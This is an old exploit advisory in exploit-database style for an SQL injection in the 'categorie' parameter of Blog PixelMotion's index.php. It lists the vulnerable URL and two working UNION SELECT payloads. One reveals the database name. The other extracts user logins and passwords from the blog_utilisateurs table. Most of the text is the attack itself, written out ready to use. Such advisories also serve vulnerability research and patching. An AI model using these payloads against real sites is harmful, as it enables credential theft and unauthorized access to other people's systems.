Blog PixelMotion index.php categorie SQL Injection Vulnerability.pdf

1 Blog Pixel Motion Sql Injection Vulnerability 2 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 3 # Author : parad0x 4 # Home : www.inso.host.sk 5 # Script : Blog PixelMotion 6 # Download : http://www.pixelmotion.org/zip/blog.zip 7 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 8 http://[target]/index.php?categorie=[SQL] 9 10 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 11 Example: 12 13 http://www.xxx.org/blog/index.php?categorie=−1+union+select+0,1,2,database(),4,5,6/* 14 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 15 greetz : VoLqaN 16 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 17 18 side note (thanks C0D3R−DZ): 19 http://localhost/[script_path]/index.php?categorie=−1+union+select+1,2,concat(login,0x3a,pass),4,5,6+from+blog_utilis ateurs/* 20 21 # milw0rm.com [2008−04−06] Page 1/1 Blog PixelMotion index.php categorie SQL Injection Vulnerability parad0x 04/06/2008